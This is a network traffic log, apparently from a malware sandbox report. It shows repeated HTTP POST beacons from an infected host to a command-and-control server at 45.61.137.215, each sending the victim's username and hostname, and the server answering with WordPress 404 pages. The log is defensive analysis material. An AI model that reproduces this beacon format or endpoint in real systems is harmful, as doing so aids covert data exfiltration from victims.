May 29, 2024 15:45:58.883152962 CEST	896	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:45:58.883187056 CEST	1236	IN	Data Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64 Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
May 29, 2024 15:45:58.883222103 CEST	1236	IN	Data Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29 Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
May 29, 2024 15:45:58.883253098 CEST	448	IN	Data Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
May 29, 2024 15:45:58.883285999 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:45:58.883322001 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.9	49804	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:45:59.101278067 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:45:59.106617928 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:46:01.576543093 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:45:59 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:46:01.576561928 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:46:01.576574087 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:46:01.576591015 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:46:01.576601982 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:46:01.576613903 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:46:01.576626062 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 29, 2024 15:46:01.577065945 CEST	1236	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-c
May 29, 2024 15:46:01.577078104 CEST	1236	IN	Data Raw: 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: t;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-
May 29, 2024 15:46:01.577090025 CEST	1236	IN	Data Raw: 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 7b 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 Data Ascii: important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-bo

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.9	49805	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:46:01.734415054 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:46:01.739599943 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:46:04.480976105 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:46:02 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:46:04.481019974 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:46:04.481059074 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
May 29, 2024 15:46:04.481091022 CEST	1236	IN	Data Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21 Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
May 29, 2024 15:46:04.481126070 CEST	1236	IN	Data Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
May 29, 2024 15:46:04.481158018 CEST	1236	IN	Data Raw: 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 32 35 35 2c 31 30 35 2c 30 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 Data Ascii: nge-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-w
May 29, 2024 15:46:04.481193066 CEST	1236	IN	Data Raw: 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 32 30 3a 20 30 2e 34 34 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 33 30 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 Data Ascii: -preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--p
May 29, 2024 15:46:04.481221914 CEST	108	IN	Data Raw: 77 68 69 74 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 77 68 69 74 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 70 61 6c 65 2d 70 69 6e 6b 2d 63 6f 6c 6f Data Ascii: white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-
May 29, 2024 15:46:04.481255054 CEST	1236	IN	Data Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
May 29, 2024 15:46:04.481290102 CEST	1236	IN	Data Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.9	49806	45.61.137.215	80

Timestamp	Bytes transferred	Direction	Data
May 29, 2024 15:46:04.642667055 CEST	246	OUT	POST /index.php/3b1tenbkyj HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.137.215 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: DCC85916 Content-Length: 145 Connection: close
May 29, 2024 15:46:04.647743940 CEST	145	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01 Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
May 29, 2024 15:46:07.301341057 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Wed, 29 May 2024 13:46:05 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found – separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper » Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper » Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
May 29, 2024 15:46:07.301405907 CEST	1236	IN	Data Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22 Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/! This file is auto-generated /!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
May 29, 2024 15:46:07.301441908 CEST	1236	IN	Data Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
